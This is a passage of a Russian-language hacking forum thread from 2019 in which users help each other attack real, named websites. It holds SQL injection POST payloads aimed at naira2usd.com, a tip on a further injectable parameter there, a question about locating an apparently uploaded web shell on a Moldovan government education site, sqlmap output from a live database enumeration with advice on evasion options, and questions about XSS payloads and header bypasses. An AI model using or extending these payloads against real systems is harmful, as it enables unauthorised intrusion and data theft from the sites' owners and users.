HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #2661  
Старый 21.08.2019, 05:11
l1ght
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
Провел на форуме:
14023893

Репутация: 2163
По умолчанию

Цитата:
Сообщение от b3  
b3 said:

не понятно почему ругается на LIKE
ахахах нубас, рассмешил посмотри еще раз на запрос, истина где-то рядом!
__________________
Я так же грустен как орангутанг
Сидящей пред галдящею толпою
Суровый житель отогретых стран
Коварно преданный разлуке и покою
Ему и мне насмешница судьба
Дала для жизни крохотную клетку
Нам предстоит в ней долгоя хотьба
За тертую морковь, и за конфетку..
 
Ответить с цитированием

  #2662  
Старый 21.08.2019, 05:24
BabaDook
Guest
Сообщений: n/a
Провел на форуме:
238786

Репутация: 40
По умолчанию

Цитата:
Сообщение от l1ght  
l1ght said:

ахахах нубас, рассмешил
посмотри еще раз на запрос, истина где-то рядом!
Лайтик :love: там нет инъекции.

п.с я чет не понял юмора

( LIKE '%3%' OR LIKE '%3%' )
 
Ответить с цитированием

  #2663  
Старый 21.08.2019, 11:48
madam
Guest
Сообщений: n/a
Провел на форуме:
50513

Репутация: 1
По умолчанию

Да не хотит крутится сайт https:/_/naira2usd.com/myreferralsx POST draw=6&columns[0][data]='&columns[0][name]=Smith&columns[0][searchable]=true&columns[0][orderable]=true&columns[0][search][value]=3&columns[0][search][regex]=false&columns[1][data]=1&columns[1][name]=Smith&columns[1][searchable]=true&columns[1][orderable]=true&columns[1][search][value]=3&columns[1][search][regex]=false&start=3&length=100&search[value]=3&search[regex]=false

может у кого получится
 
Ответить с цитированием

  #2664  
Старый 21.08.2019, 16:50
karkajoi
Guest
Сообщений: n/a
Провел на форуме:
96779

Репутация: 5
По умолчанию

Цитата:
Сообщение от madam  
madam said:

Да не хотит крутится сайт https:/_/naira2usd.com/myreferralsx POST draw=6&columns[0][data]='&columns[0][name]=Smith&columns[0][searchable]=true&columns[0][orderable]=true&columns[0][search][value]=3&columns[0][search][regex]=false&columns[1][data]=1&columns[1][name]=Smith&columns[1][searchable]=true&columns[1][orderable]=true&columns[1][search][value]=3&columns[1][search][regex]=false&start=3&length=100&search[value]=3&search[regex]=false
может у кого получится
Не хотит наверное потому что там ее нету скорее всего, ну я покрайнемере ничего необычного не увидел))

В другом месте потенциальная есть

Код:
Code:
https://naira2usd.com/confirmx
POST
draw=2&columns[0][data]=&columns[0][name]=&columns[0][searchable]=true&columns[0][orderable]=true&columns[0][search][value]=&columns[0][search][regex]=false&columns[1][data]=1&columns[1][name]=&columns[1][searchable]=true&columns[1][orderable]=true&columns[1][search][value]=&columns[1][search][regex]=false&columns[2][data]=2&columns[2][name]=&columns[2][searchable]=true&columns[2][orderable]=true&columns[2][search][value]=&columns[2][search][regex]=false&columns[3][data]=3&columns[3][name]=&columns[3][searchable]=true&columns[3][orderable]=true&columns[3][search][value]=&columns[3][search][regex]=false&columns[4][data]=4&columns[4][name]=&columns[4][searchable]=true&columns[4][orderable]=true&columns[4][search][value]=&columns[4][search][regex]=false&start=0&length=100&search[value]='&search[regex]=false
 
Ответить с цитированием

  #2665  
Старый 24.08.2019, 02:50
Octavian
Guest
Сообщений: n/a
Провел на форуме:
97114

Репутация: 24
По умолчанию

Обходить X-Requested-With можно только через .swf?
 
Ответить с цитированием

  #2666  
Старый 28.08.2019, 15:27
kostea
Guest
Сообщений: n/a
Провел на форуме:
9857

Репутация: 0
По умолчанию

Привет, помогите узнать где залился файл filemanager.php7 из раздела "Clasa a I-a" http://ctice.gov.md/manuale-scolare/

http://ctice.md/public/download.php?id=249
 
Ответить с цитированием

  #2667  
Старый 29.08.2019, 22:58
AngelEyes
Guest
Сообщений: n/a
Провел на форуме:
1924

Репутация: 0
По умолчанию

[01:38:29] [INFO] the back-end DBMS is MySQL

back-end DBMS: MySQL 5 (MariaDB fork)

[01:38:29] [INFO] fetching database names

[01:38:29] [INFO] fetching number of databases

[01:38:30] [INFO] resumed: ЩЩ

[01:38:30] [ERROR] unable to retrieve the number of databases

[01:38:30] [INFO] falling back to current database

[01:38:30] [INFO] fetching current database

[01:38:30] [WARNING] cannot properly display (some) Unicode characters inside your terminal ('cp866') environment. All unhandled occurrences will result in replacement with '?' character. Please, find proper character representation inside corresponding output files

[01:38:30] [INFO] resumed: `к?

available databases [1]:
[*] `к?

Как с этим бороться?
 
Ответить с цитированием

  #2668  
Старый 30.08.2019, 00:25
karkajoi
Guest
Сообщений: n/a
Провел на форуме:
96779

Репутация: 5
По умолчанию

Цитата:
Сообщение от AngelEyes  
AngelEyes said:

[01:38:29] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5 (MariaDB fork)
[01:38:29] [INFO] fetching database names
[01:38:29] [INFO] fetching number of databases
[01:38:30] [INFO] resumed: ЩЩ
[01:38:30] [ERROR] unable to retrieve the number of databases
[01:38:30] [INFO] falling back to current database
[01:38:30] [INFO] fetching current database
[01:38:30] [WARNING] cannot properly display (some) Unicode characters inside your terminal ('cp866') environment. All unhandled occurrences will result in replacement with '?' character. Please, find proper character representation inside corresponding output files
[01:38:30] [INFO] resumed: `к?
available databases [1]:[*] `к?
Как с этим бороться?
--hex по пробуй
 
Ответить с цитированием

  #2669  
Старый 30.08.2019, 09:58
AngelEyes
Guest
Сообщений: n/a
Провел на форуме:
1924

Репутация: 0
По умолчанию

Цитата:
Сообщение от karkajoi  
karkajoi said:

--hex по пробуй
Пробовал,тамперы перепробовал
 
Ответить с цитированием

  #2670  
Старый 04.09.2019, 20:28
Octavian
Guest
Сообщений: n/a
Провел на форуме:
97114

Репутация: 24
По умолчанию

А чем можно заменить ()в

<script>alert(1)</script>
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ